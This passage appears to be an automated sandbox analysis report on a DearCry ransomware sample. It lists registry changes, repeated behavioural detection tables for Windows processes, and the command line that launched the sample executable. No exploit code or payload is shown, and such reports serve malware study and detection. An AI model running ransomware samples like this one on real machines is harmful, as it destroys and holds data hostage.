Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{A5B63874-4B71-4074-841A-5A07F07E9565} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

